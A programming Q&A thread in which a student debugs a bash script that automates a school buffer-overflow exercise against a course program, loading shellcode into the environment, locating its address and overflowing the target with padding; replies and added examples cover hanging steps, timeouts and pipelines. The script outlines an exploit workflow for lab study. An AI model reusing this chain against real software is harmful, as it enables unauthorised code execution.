
I'm writing a buffer overflow exploit for a school project. The program I'm trying to exploit is called casper4. I know how to exploit the program but now I'm trying to put the sequence of commands into one shell script.

My script looks like this:

#!/bin/bash
# $(<file) and echo -e are bash features: under #!/bin/sh (dash) the
# $(<...) expansions below come out empty and "-e" is printed literally.
./egg1; # Put the shell code in the environment
./eggfind > output.txt; # Put the address of the shellcode in output.txt
./escapeAddr "$(<output.txt)" > addressHexa.txt # Escape the address
echo -e "$(<addressHexa.txt)" > address.txt; # Address to ASCII
perl -e 'print "A"x789' > As.txt; # Get As to fill the buffer
cat As.txt address.txt > input.txt; # Create one input file
./casper4 "$(<input.txt)"; # Feed the input to the program

I don't think it's important to know what each script/program does. The problem is that whenever I run this script it only seems to execute ./egg1 instead of all the commands in sequence.

It produces the correct result when I enter each of these lines separately into my command-line.

How can I let this script achieve the same result as entering each of these lines one for one into the command-line?

Thomas Vanhelden
  • This is probably because calling `egg1` makes the script hang. If you have a set of commands, they are being executed one after the other: once one is done, the next one takes over. – fedorqui Dec 08 '15 at 12:08
  • There is also a chance that the `./egg1` changes the working directory. – sjsam Dec 08 '15 at 12:16
  • You should trace the execution (`set -x`) to see what's going on. – user1934428 Dec 08 '15 at 12:23
  • @fedorqui `egg1` executes successfully. I think so because the script prints "Eggshell loaded into environment." and I can run `eggfind` afterwards to get the address. – Thomas Vanhelden Dec 08 '15 at 12:38
  • Literally no way of knowing what is wrong without seeing what all the scripts do. Any attempt to help will be pure speculation. – 123 Dec 08 '15 at 14:50
  • Yes, you're right. Problem was with one of the scripts. I voted to close the question. Sorry. – Thomas Vanhelden Dec 08 '15 at 15:04

2 Answers


More than likely one of the commands is not exiting, and this is holding up the whole sequence. The best option is to add timeouts to your code to help in debugging.

I would suggest this article on coding in shell defensively: Robust shell scripts

Including a timeout in your script: Timeout a command in bash

Thomas Vincent
  • Do I need to? All I'm really trying to do is put these lines, that work when entering them one for one into the command-line, into a script. Shouldn't it be really simple? – Thomas Vanhelden Dec 08 '15 at 12:45
  • @ThomasVanhelden Sorry for being blunt, but I don't believe you when you say that the script has the same commands you type. For example, the script has a lot of useless semicolons which I don't think you typed. Please provide us with proof that the commands work when typed. One such proof would be a typescript created with `script` followed by the commands. – Jens Dec 08 '15 at 15:04
  • @Jens No problem, I deserve it. The problem is not in the script I posted, it turned out to be a problem in the `egg1` script. `egg1` opened a bash shell so all the other commands in the script I posted were processed by that shell instead of in the original. I therefore voted to close my question since it's a really bad one. – Thomas Vanhelden Dec 08 '15 at 15:11
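The per-step timeout this answer recommends, written out as an added example that is not code from the question or from either answer. The `step_*` functions are constructed stand-ins for the asker's helper programs (egg1, eggfind and the rest), and `STEP_TIMEOUT`, `run_step` and `run_sequence` are names chosen here. Besides the time limit, each step gets its stdin from /dev/null, which covers the failure mode the asker found: a helper that drops into an interactive shell reads EOF and returns instead of consuming the rest of the sequence.

```shell
#!/bin/sh
# Added example (not code from the question or its answers): run the steps of
# a multi-step script one at a time, each with stdin detached and a time
# limit, so a step that waits for terminal input or never returns is reported
# by name instead of silently stalling everything after it.
set -u

# Seconds a single step may run before the watchdog kills it (constructed
# default; override with STEP_TIMEOUT=5 ./script.sh).
STEP_TIMEOUT="${STEP_TIMEOUT:-1}"

# run_step NAME COMMAND [ARGS...]
# stdin comes from /dev/null, so a step that starts an interactive shell or
# otherwise reads the terminal sees EOF and returns instead of swallowing the
# commands that follow. If the step outlives STEP_TIMEOUT it is killed and
# the function returns 124 (the same convention coreutils timeout uses).
run_step() {
    local name pid watchdog rc
    name="$1"; shift
    printf '+ [%s] %s\n' "$name" "$*" >&2
    "$@" </dev/null &
    pid=$!
    # Watchdog: detached from stdout/stderr so it cannot keep a caller's
    # capture pipe open after the step itself has finished.
    ( sleep "$STEP_TIMEOUT"; kill "$pid" 2>/dev/null ) >/dev/null 2>&1 &
    watchdog=$!
    rc=0
    wait "$pid" 2>/dev/null || rc=$?
    kill "$watchdog" 2>/dev/null || :
    if [ "$rc" -eq 143 ]; then   # 128 + SIGTERM: the watchdog fired
        printf '! step %s timed out after %ss\n' "$name" "$STEP_TIMEOUT" >&2
        rc=124
    fi
    return "$rc"
}

# run_sequence STEP_FUNCTION...
# Runs the named steps in order, stops at the first one that fails or times
# out, prints that step's name on stdout and returns its exit code.
run_sequence() {
    local step rc
    for step in "$@"; do
        rc=0
        run_step "$step" "$step" || rc=$?
        if [ "$rc" -ne 0 ]; then
            printf '%s\n' "$step"
            return "$rc"
        fi
    done
    return 0
}

# Constructed stand-ins for the asker's helpers (egg1, eggfind, ...).
step_ok()            { echo "Eggshell loaded into environment." >/dev/null; }
step_reads_stdin()   { cat >/dev/null; }   # like a helper that opens a shell
step_never_returns() { exec sleep 5; }     # exec: the watchdog kills sleep itself
step_unreached()     { echo "never runs" >/dev/null; }

main() {
    local failed rc
    rc=0
    failed=$(run_sequence step_ok step_reads_stdin step_never_returns step_unreached) || rc=$?
    if [ "$rc" -eq 0 ]; then
        echo "all steps completed"
    else
        echo "stopped at step: $failed (exit $rc)"   # stopped at step: step_never_returns (exit 124)
    fi
}
main
```

Because the watchdog signals only the direct child, a step that is itself a wrapper script around the real program needs to `exec` it (as `step_never_returns` does) or the wrapper dies while the program keeps running; real helpers invoked directly, like `./egg1`, are already their own process. Combine this with `set -x` to see both the command being started and the point where the sequence stops.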

You could pipeline the commands by using ./egg1 | ./eggfind | ... The ... meaning the rest of your commands. Just separate them by |.

Josh Tree
  • I tried that but it doesn't provide the required result. It does execute `casper4` (the last command) but it calls it with empty output. All files created in the script are empty. – Thomas Vanhelden Dec 08 '15 at 14:45
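A constructed demonstration, added here and not part of the answer or the comment, of why the pipelined form hands the last command empty input. All stages of a pipeline start at the same time, so a stage that reads a file through command substitution (the question's `"$(<output.txt)"`) runs that substitution before the earlier stage has written the file. The helper names, the one-second delay and the address value are assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example (not from the question or its answers): why joining the
# steps with | does not reproduce running them one after the other.
set -u

work="$(mktemp -d)"
trap 'rm -rf "$work"' EXIT

# Stand-in for a helper that takes a moment and then writes an address file
# (the role eggfind plays in the question). Constructed value.
write_addr() { sleep 1; printf '0x41414141' > "$work/output.txt"; }

# Stand-in for the next step, which reads that file through command
# substitution the way the question's script does.
read_addr() { printf '%s' "$(cat "$work/output.txt" 2>/dev/null)"; }

# Pipelined: read_addr starts at once, finds no file yet and prints nothing.
piped_result() {
    rm -f "$work/output.txt"
    write_addr | read_addr
}

# Sequenced with ; or &&: read_addr only starts after write_addr returned.
sequenced_result() {
    rm -f "$work/output.txt"
    write_addr && read_addr
}

echo "pipelined: '$(piped_result)'"      # pipelined: ''
echo "sequenced: '$(sequenced_result)'"  # sequenced: '0x41414141'
```

A pipe only helps when each stage consumes the previous stage's standard output; the question's steps communicate through files and command substitution, so they need `;` or `&&` (which also stops the sequence at the first failing step).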